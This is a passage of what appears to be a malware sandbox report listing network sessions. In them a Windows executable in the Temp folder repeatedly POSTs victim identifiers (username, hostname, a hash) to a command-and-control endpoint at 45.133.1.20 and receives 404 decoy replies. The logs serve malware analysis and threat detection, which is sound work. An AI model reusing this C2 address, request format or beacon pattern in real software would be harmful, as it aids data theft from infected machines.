May 5, 2022 08:46:28.170344114 CEST	1235	OUT	POST /oluwa/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.133.1.20 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2D36A626 Content-Length: 169 Connection: close
May 5, 2022 08:46:28.196135044 CEST	1236	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer701188DESKTOP-716T77108F9C4E9C79A3B52B3F739430
May 5, 2022 08:46:28.254359961 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Thu, 05 May 2022 06:46:28 GMT Server: Apache Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.6	49791	45.133.1.20	80	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Timestamp	kBytes transferred	Direction	Data
May 5, 2022 08:46:30.051409006 CEST	1237	OUT	POST /oluwa/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.133.1.20 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2D36A626 Content-Length: 169 Connection: close
May 5, 2022 08:46:30.077204943 CEST	1237	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer701188DESKTOP-716T77108F9C4E9C79A3B52B3F739430
May 5, 2022 08:46:30.135314941 CEST	1237	IN	HTTP/1.0 404 Not Found Date: Thu, 05 May 2022 06:46:30 GMT Server: Apache Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.6	49793	45.133.1.20	80	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Timestamp	kBytes transferred	Direction	Data
May 5, 2022 08:46:31.492450953 CEST	1251	OUT	POST /oluwa/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.133.1.20 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2D36A626 Content-Length: 169 Connection: close
May 5, 2022 08:46:31.518572092 CEST	1251	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer701188DESKTOP-716T77108F9C4E9C79A3B52B3F739430
May 5, 2022 08:46:31.569453955 CEST	1263	IN	HTTP/1.0 404 Not Found Date: Thu, 05 May 2022 06:46:31 GMT Server: Apache Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.2.6	49795	45.133.1.20	80	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Timestamp	kBytes transferred	Direction	Data
May 5, 2022 08:46:32.770695925 CEST	1271	OUT	POST /oluwa/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.133.1.20 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2D36A626 Content-Length: 169 Connection: close
May 5, 2022 08:46:32.796432972 CEST	1271	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer701188DESKTOP-716T77108F9C4E9C79A3B52B3F739430
May 5, 2022 08:46:32.845130920 CEST	1271	IN	HTTP/1.0 404 Not Found Date: Thu, 05 May 2022 06:46:32 GMT Server: Apache Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.2.6	49796	45.133.1.20	80	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Timestamp	kBytes transferred	Direction	Data
May 5, 2022 08:46:36.985054970 CEST	1286	OUT	POST /oluwa/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.133.1.20 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2D36A626 Content-Length: 169 Connection: close
May 5, 2022 08:46:37.010900021 CEST	1286	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer701188DESKTOP-716T77108F9C4E9C79A3B52B3F739430
May 5, 2022 08:46:37.077541113 CEST	1286	IN	HTTP/1.0 404 Not Found Date: Thu, 05 May 2022 06:46:36 GMT Server: Apache Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.2.6	49801	45.133.1.20	80	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Timestamp	kBytes transferred	Direction	Data
May 5, 2022 08:46:39.663667917 CEST	1325	OUT	POST /oluwa/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.133.1.20 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2D36A626 Content-Length: 169 Connection: close
May 5, 2022 08:46:39.689560890 CEST	1325	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer701188DESKTOP-716T77108F9C4E9C79A3B52B3F739430
May 5, 2022 08:46:39.747967958 CEST	1326	IN	HTTP/1.0 404 Not Found Date: Thu, 05 May 2022 06:46:39 GMT Server: Apache Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.6	49773	45.133.1.20	80	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Timestamp	kBytes transferred	Direction	Data
May 5, 2022 08:46:04.197166920 CEST	1064	OUT	POST /oluwa/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.133.1.20 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2D36A626 Content-Length: 169 Connection: close
May 5, 2022 08:46:04.222978115 CEST	1065	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer701188DESKTOP-716T77108F9C4E9C79A3B52B3F739430
May 5, 2022 08:46:04.298516035 CEST	1065	IN	HTTP/1.0 404 Not Found Date: Thu, 05 May 2022 06:46:04 GMT Server: Apache Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.2.6	49803	45.133.1.20	80	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Timestamp	kBytes transferred	Direction	Data
May 5, 2022 08:46:41.821501017 CEST	1333	OUT	POST /oluwa/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.133.1.20 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2D36A626 Content-Length: 169 Connection: close
May 5, 2022 08:46:41.847678900 CEST	1333	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer701188DESKTOP-716T77108F9C4E9C79A3B52B3F739430
May 5, 2022 08:46:41.905873060 CEST	1334	IN	HTTP/1.0 404 Not Found Date: Thu, 05 May 2022 06:46:41 GMT Server: Apache Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	192.168.2.6	49806	45.133.1.20	80	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Timestamp	kBytes transferred	Direction	Data
May 5, 2022 08:46:47.095755100 CEST	1347	OUT	POST /oluwa/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.133.1.20 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2D36A626 Content-Length: 169 Connection: close
May 5, 2022 08:46:47.121552944 CEST	1348	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer701188DESKTOP-716T77108F9C4E9C79A3B52B3F739430
May 5, 2022 08:46:47.184792995 CEST	1348	IN	HTTP/1.0 404 Not Found Date: Thu, 05 May 2022 06:46:47 GMT Server: Apache Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
22	192.168.2.6	49807	45.133.1.20	80	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Timestamp	kBytes transferred	Direction	Data
May 5, 2022 08:46:49.130492926 CEST	1349	OUT	POST /oluwa/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.133.1.20 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2D36A626 Content-Length: 169 Connection: close
May 5, 2022 08:46:49.156307936 CEST	1349	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer701188DESKTOP-716T77108F9C4E9C79A3B52B3F739430
May 5, 2022 08:46:49.213563919 CEST	1349	IN	HTTP/1.0 404 Not Found Date: Thu, 05 May 2022 06:46:49 GMT Server: Apache Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
23	192.168.2.6	49813	45.133.1.20	80	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Timestamp	kBytes transferred	Direction	Data
May 5, 2022 08:46:50.492080927 CEST	1353	OUT	POST /oluwa/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.133.1.20 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2D36A626 Content-Length: 169 Connection: close
May 5, 2022 08:46:50.520315886 CEST	1371	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer701188DESKTOP-716T77108F9C4E9C79A3B52B3F739430
May 5, 2022 08:46:50.568424940 CEST	1371	IN	HTTP/1.0 404 Not Found Date: Thu, 05 May 2022 06:46:50 GMT Server: Apache Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
24	192.168.2.6	49814	45.133.1.20	80	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Timestamp	kBytes transferred	Direction	Data
May 5, 2022 08:46:51.558074951 CEST	1372	OUT	POST /oluwa/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.133.1.20 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2D36A626 Content-Length: 169 Connection: close
May 5, 2022 08:46:51.584703922 CEST	1376	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer701188DESKTOP-716T77108F9C4E9C79A3B52B3F739430
May 5, 2022 08:46:51.641252041 CEST	2341	IN	HTTP/1.0 404 Not Found Date: Thu, 05 May 2022 06:46:51 GMT Server: Apache Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
25	192.168.2.6	49816	45.133.1.20	80	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Timestamp	kBytes transferred	Direction	Data
May 5, 2022 08:46:55.974919081 CEST	7131	OUT	POST /oluwa/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.133.1.20 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2D36A626 Content-Length: 169 Connection: close
May 5, 2022 08:46:56.001226902 CEST	7131	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer701188DESKTOP-716T77108F9C4E9C79A3B52B3F739430
May 5, 2022 08:46:56.063024998 CEST	7131	IN	HTTP/1.0 404 Not Found Date: Thu, 05 May 2022 06:46:55 GMT Server: Apache Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
26	192.168.2.6	49818	45.133.1.20	80	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Timestamp	kBytes transferred	Direction	Data
May 5, 2022 08:46:57.751458883 CEST	7133	OUT	POST /oluwa/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.133.1.20 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2D36A626 Content-Length: 169 Connection: close
May 5, 2022 08:46:57.777304888 CEST	7133	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer701188DESKTOP-716T77108F9C4E9C79A3B52B3F739430
May 5, 2022 08:46:57.840574026 CEST	7139	IN	HTTP/1.0 404 Not Found Date: Thu, 05 May 2022 06:46:57 GMT Server: Apache Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
27	192.168.2.6	49819	45.133.1.20	80	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Timestamp	kBytes transferred	Direction	Data
May 5, 2022 08:46:59.128279924 CEST	7140	OUT	POST /oluwa/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.133.1.20 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2D36A626 Content-Length: 169 Connection: close
May 5, 2022 08:46:59.154638052 CEST	7140	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer701188DESKTOP-716T77108F9C4E9C79A3B52B3F739430
May 5, 2022 08:46:59.219291925 CEST	7140	IN	HTTP/1.0 404 Not Found Date: Thu, 05 May 2022 06:46:59 GMT Server: Apache Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
28	192.168.2.6	49820	45.133.1.20	80	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Timestamp	kBytes transferred	Direction	Data
May 5, 2022 08:47:00.537714005 CEST	7141	OUT	POST /oluwa/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.133.1.20 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2D36A626 Content-Length: 169 Connection: close
May 5, 2022 08:47:00.563507080 CEST	7141	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer701188DESKTOP-716T77108F9C4E9C79A3B52B3F739430
May 5, 2022 08:47:01.030510902 CEST	7184	IN	HTTP/1.0 404 Not Found Date: Thu, 05 May 2022 06:47:00 GMT Server: Apache Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
29	192.168.2.6	49824	45.133.1.20	80	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Timestamp	kBytes transferred	Direction	Data
May 5, 2022 08:47:03.719001055 CEST	7234	OUT	POST /oluwa/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.133.1.20 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2D36A626 Content-Length: 169 Connection: close
May 5, 2022 08:47:03.744713068 CEST	7234	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer701188DESKTOP-716T77108F9C4E9C79A3B52B3F739430
May 5, 2022 08:47:03.798513889 CEST	7234	IN	HTTP/1.0 404 Not Found Date: Thu, 05 May 2022 06:47:03 GMT Server: Apache Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.6	49774	45.133.1.20	80	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Timestamp	kBytes transferred	Direction	Data
May 5, 2022 08:46:07.670756102 CEST	1066	OUT	POST /oluwa/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.133.1.20 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2D36A626 Content-Length: 169 Connection: close
May 5, 2022 08:46:07.696929932 CEST	1067	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer701188DESKTOP-716T77108F9C4E9C79A3B52B3F739430
May 5, 2022 08:46:07.746820927 CEST	1071	IN	HTTP/1.0 404 Not Found Date: Thu, 05 May 2022 06:46:07 GMT Server: Apache Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
30	192.168.2.6	49828	45.133.1.20	80	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Timestamp	kBytes transferred	Direction	Data
May 5, 2022 08:47:06.412861109 CEST	7938	OUT	POST /oluwa/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.133.1.20 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2D36A626 Content-Length: 169 Connection: close
May 5, 2022 08:47:06.438435078 CEST	7939	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer701188DESKTOP-716T77108F9C4E9C79A3B52B3F739430
May 5, 2022 08:47:06.487222910 CEST	7939	IN	HTTP/1.0 404 Not Found Date: Thu, 05 May 2022 06:47:06 GMT Server: Apache Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
31	192.168.2.6	49833	45.133.1.20	80	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Timestamp	kBytes transferred	Direction	Data
May 5, 2022 08:47:08.250713110 CEST	7987	OUT	POST /oluwa/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.133.1.20 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2D36A626 Content-Length: 169 Connection: close
May 5, 2022 08:47:08.276225090 CEST	7987	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer701188DESKTOP-716T77108F9C4E9C79A3B52B3F739430
May 5, 2022 08:47:08.327680111 CEST	7987	IN	HTTP/1.0 404 Not Found Date: Thu, 05 May 2022 06:47:08 GMT Server: Apache Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
32	192.168.2.6	49839	45.133.1.20	80	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Timestamp	kBytes transferred	Direction	Data
May 5, 2022 08:47:09.336080074 CEST	8098	OUT	POST /oluwa/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.133.1.20 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2D36A626 Content-Length: 169 Connection: close
May 5, 2022 08:47:09.363354921 CEST	8128	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer701188DESKTOP-716T77108F9C4E9C79A3B52B3F739430
May 5, 2022 08:47:09.413443089 CEST	8176	IN	HTTP/1.0 404 Not Found Date: Thu, 05 May 2022 06:47:09 GMT Server: Apache Status: 404 Not Found Content-Length: 23 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
33	192.168.2.6	49847	45.133.1.20	80	C:\Users\user\AppData\Local\Temp\cbgsujmwws.exe

Timestamp	kBytes transferred	Direction	Data
May 5, 2022 08:47:10.430170059 CEST	8228	OUT	POST /oluwa/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.133.1.20 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 2D36A626 Content-Length: 169 Connection: close
May 5, 2022 08:47:10.456146002 CEST	8229	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer701188DESKTOP-716T77108F9C4E9C79A3B52B3F739430
